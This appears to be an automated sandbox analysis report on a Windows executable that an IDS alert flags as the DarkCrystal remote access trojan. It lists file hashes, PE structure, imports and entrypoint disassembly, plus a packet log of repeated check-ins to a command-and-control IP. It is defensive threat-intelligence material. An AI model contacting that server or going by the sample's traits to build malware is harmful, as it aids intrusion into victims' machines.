                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.953968550759272
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:CJF0Ri1HrG.exe
                                                                                      File size:2'730'343 bytes
                                                                                      MD5:622af327a5c66ca6d6d41bf02384b590
                                                                                      SHA1:2e09d3d9017aec9781b77144323eacb06e7838c4
                                                                                      SHA256:1b41fe8ede3b534d1ce19e0d2976fa735e7e2187d17dcbea6c337ed176ad038a
                                                                                      SHA512:6155abf3c3131a7bfd2a7be9f216ee3e65a3492e8d2de256e98db8569a79cdbab3de710e41fa803aab5f96876a3eaf6ec813bb7320bca36c45d8eded34f1ecb9
                                                                                      SSDEEP:49152:IBJgMDRANx3WB2aXuAoVNcqUhwMH9tM+EvhyJWXovJaDiSNESDgKZR8f:yn0VkZ0yF9tMhGwHuV5KZef
                                                                                      TLSH:D4C52302BFC29272D063197379396B11697D7E202BB6CADB6344662EDD306C0E731BB5
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                                                      File Icon

                                                                                      Icon Hash:1515d4d4442f2d2d

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x41f530
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      call 00007FE108CAFECBh
                                                                                      jmp 00007FE108CAF7DDh
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      push esi
                                                                                      push dword ptr [ebp+08h]
                                                                                      mov esi, ecx
                                                                                      call 00007FE108CA2627h
                                                                                      mov dword ptr [esi], 004356D0h
                                                                                      mov eax, esi
                                                                                      pop esi
                                                                                      pop ebp
                                                                                      retn 0004h
                                                                                      and dword ptr [ecx+04h], 00000000h
                                                                                      mov eax, ecx
                                                                                      and dword ptr [ecx+08h], 00000000h
                                                                                      mov dword ptr [ecx+04h], 004356D8h
                                                                                      mov dword ptr [ecx], 004356D0h
                                                                                      ret
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      push esi
                                                                                      mov esi, ecx
                                                                                      lea eax, dword ptr [esi+04h]
                                                                                      mov dword ptr [esi], 004356B8h
                                                                                      push eax
                                                                                      call 00007FE108CB2C6Fh
                                                                                      test byte ptr [ebp+08h], 00000001h
                                                                                      pop ecx
                                                                                      je 00007FE108CAF96Ch
                                                                                      push 0000000Ch
                                                                                      push esi
                                                                                      call 00007FE108CAEF29h
                                                                                      pop ecx
                                                                                      pop ecx
                                                                                      mov eax, esi
                                                                                      pop esi
                                                                                      pop ebp
                                                                                      retn 0004h
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      sub esp, 0Ch
                                                                                      lea ecx, dword ptr [ebp-0Ch]
                                                                                      call 00007FE108CA25A2h
                                                                                      push 0043BEF0h
                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                      push eax
                                                                                      call 00007FE108CB2729h
                                                                                      int3
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      sub esp, 0Ch
                                                                                      lea ecx, dword ptr [ebp-0Ch]
                                                                                      call 00007FE108CAF8E8h
                                                                                      push 0043C0F4h
                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                      push eax
                                                                                      call 00007FE108CB270Ch
                                                                                      int3
                                                                                      jmp 00007FE108CB41A7h
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      push 00422900h
                                                                                      push dword ptr fs:[00000000h]

                                                                                      Rich Headers

                                                                                      Programming Language:
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [IMP] VS2008 SP1 build 30729

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                      PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                      RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                                      RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                                      RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                                      RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                                      RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                                      RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                                      RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                                      RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                                                      RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                                                      RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                                                      RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                                                      RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                                                      RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                                                      RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                                                      RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                                                      RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                                                      RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                                                      RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                                                      RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                                                      RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                                                      RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                                                      RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                                                      RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                                                      RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                                                      RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                      Imports

                                                                                      DLLImport
                                                                                      KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                                      OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                      gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                      Possible Origin

                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishUnited States

                                                                                      Network Behavior

                                                                                      Snort IDS Alerts

                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                      03/06/24-09:52:31.999098TCP2048095ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)4973580192.168.2.491.227.16.11

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Mar 6, 2024 09:52:31.653366089 CET4973580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:31.997859001 CET804973591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:31.997958899 CET4973580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:31.999098063 CET4973580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:32.344264984 CET804973591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:32.348309040 CET804973591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:32.349637032 CET4973580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:32.735042095 CET804973591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:32.812009096 CET804973591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:32.812118053 CET804973591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:32.812155008 CET804973591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:32.812185049 CET4973580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:32.855878115 CET4973580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:32.864692926 CET4973580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:32.973526001 CET4973680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:33.209189892 CET804973591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:33.215250969 CET4973580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:33.231373072 CET804973591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:33.277507067 CET4973580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:33.316962957 CET804973691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:33.318335056 CET4973680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:33.318561077 CET4973680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:33.584662914 CET804973591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:33.617494106 CET4973580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:33.661673069 CET804973691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:33.661731005 CET804973691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:33.662405968 CET4973680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:33.964373112 CET804973591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:33.964787006 CET4973580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:34.005873919 CET804973691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:34.034509897 CET804973691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:34.090106964 CET4973680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:34.229171038 CET4973680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:34.231770039 CET4973980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:34.309433937 CET804973591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:34.335834980 CET804973591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:34.386883974 CET4973580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:34.572370052 CET804973691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:34.572433949 CET4973680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:34.573082924 CET804973991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:34.573168993 CET4973980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:34.573467016 CET4973980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:34.914783001 CET804973991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:34.914844990 CET804973991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:34.915594101 CET4973980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:35.257131100 CET804973991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:35.285372972 CET804973991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:35.340121031 CET4973980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:35.410756111 CET4973580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:35.411017895 CET4973980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:35.414216042 CET4974080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:35.752343893 CET804973991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:35.755111933 CET804973591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:35.755228996 CET4973580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:35.755228996 CET4973980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:35.759198904 CET804974091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:35.762025118 CET4974080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:35.762254953 CET4974080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:36.107369900 CET804974091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:36.107430935 CET804974091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:36.107726097 CET4974080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:36.452747107 CET804974091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:36.479062080 CET804974091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:36.527656078 CET4974080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:36.641108990 CET4974280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:36.986656904 CET804974291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:36.987365961 CET4974280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:36.987514019 CET4974280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:37.333170891 CET804974291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:37.333208084 CET804974291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:37.333544016 CET4974280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:37.679131985 CET804974291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:37.707859993 CET804974291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:37.761924982 CET4974280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:37.840925932 CET4974280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:37.842545986 CET4974380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:38.186317921 CET804974291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:38.186397076 CET4974280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:38.187306881 CET804974391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:38.187393904 CET4974380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:38.187553883 CET4974380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:38.532370090 CET804974391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:38.532499075 CET804974391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:38.532763958 CET4974380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:38.877758980 CET804974391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:38.906996012 CET804974391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:38.949531078 CET4974380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.053997040 CET4974380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.054963112 CET4974580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.341914892 CET4974680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.398081064 CET804974591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:39.398293018 CET4974580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.398377895 CET4974580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.399070024 CET804974391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:39.399133921 CET4974380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.476191044 CET4974580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.685046911 CET804974691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:39.685147047 CET4974680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.685349941 CET4974680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.741528988 CET804974591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:39.741556883 CET804974591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:39.741756916 CET4974580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.819690943 CET804974591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:39.819756985 CET4974580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.910233974 CET4974080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:40.028417110 CET804974691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:40.028506994 CET804974691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:40.074410915 CET4974680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:40.087990999 CET4974680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:40.091943026 CET4974780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:40.431441069 CET804974691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:40.432478905 CET804974791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:40.432632923 CET4974780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:40.437248945 CET4974780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:40.459626913 CET804974691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:40.511898041 CET4974680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:40.779277086 CET804974791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:40.779300928 CET804974791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:40.779640913 CET4974780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:41.121202946 CET804974791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:41.148926020 CET804974791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:41.199402094 CET4974780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:43.915899992 CET4974680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:43.919186115 CET4974780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:43.919591904 CET4974980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:44.259747028 CET804974791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:44.259887934 CET4974780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:44.260214090 CET804974691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:44.260265112 CET4974680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:44.264698982 CET804974991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:44.264780045 CET4974980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:44.264975071 CET4974980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:44.610251904 CET804974991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:44.610304117 CET804974991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:44.610636950 CET4974980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:44.956151962 CET804974991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:44.985385895 CET804974991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:44.986268044 CET4974980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.119117022 CET4975080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.332684040 CET804974991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:45.332843065 CET4974980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.460798979 CET804975091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:45.460921049 CET4975080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.461106062 CET4975080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.468244076 CET4975080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.468522072 CET4975180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.605514050 CET4975280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.802844048 CET804975091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:45.802882910 CET804975091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:45.802953005 CET4975080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.809537888 CET804975091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:45.809607029 CET4975080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.811521053 CET804975191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:45.811614037 CET4975180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.811775923 CET4975180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.946378946 CET804975291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:45.946496010 CET4975280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.946743965 CET4975280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:46.155179977 CET804975191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:46.155237913 CET804975191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:46.155657053 CET4975180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:46.287306070 CET804975291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:46.287347078 CET804975291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:46.287606001 CET4975280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:46.498967886 CET804975191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:46.527968884 CET804975191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:46.628741026 CET804975291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:46.631942034 CET4975180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:46.656646967 CET804975291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:46.813002110 CET4975180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:46.813123941 CET4975280192.168.2.491.227.16.11
